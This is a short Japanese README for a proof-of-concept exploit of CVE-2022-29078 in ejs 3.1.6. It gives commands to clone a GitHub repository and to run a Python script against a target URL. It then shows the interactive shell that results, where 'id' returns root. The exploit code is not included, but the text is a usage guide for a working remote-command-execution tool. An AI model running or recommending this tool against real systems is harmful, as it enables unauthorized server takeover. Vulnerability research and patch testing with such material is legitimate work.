
CVE-2022-29078(ejs 3.1.6)の概念実証エクスプロイト。Pythonスクリプトを介してリモートコマンド実行を可能にします。ターゲットURLを受け付け、対話型シェルを提供します。
CVE-2022-29078(ejs 3.1.6 の脆弱性)用のシンプルな PoC
git clone https://github.com/chuckdu21/CVE-2022-29078.git
cd CVE-2022-29078
python3 CVE-2022-29078.py <URL>
コマンドを実行するためのプロンプトが表示されます
$ id
uid=0(root) gid=0(root) groupes=0(root)